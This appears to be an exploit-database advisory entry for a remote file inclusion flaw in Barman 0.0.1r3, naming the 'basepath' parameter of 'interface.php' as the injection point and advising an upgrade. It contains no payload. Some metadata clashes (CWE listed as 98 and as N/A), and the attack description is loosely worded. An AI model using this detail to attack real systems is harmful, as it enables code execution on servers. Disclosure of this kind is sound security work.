vendor:
Barman
by:
DeltahackingTEAM
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Barman
Affected Version From: 0.0.1r3
Affected Version To: 0.0.1r3
Patch Exists: Yes
Related CWE: N/A
CPE: a:barman:barman:0.0.1r3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Barman 0.0.1r3 Remote File Inclusion
A remote file inclusion vulnerability exists in Barman 0.0.1r3. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to the 'basepath' parameter in the 'interface.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL to a legitimate user of the application. The malicious URL contains a specially crafted 'basepath' parameter with a malicious file path. This can allow the attacker to execute arbitrary code on the vulnerable system.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
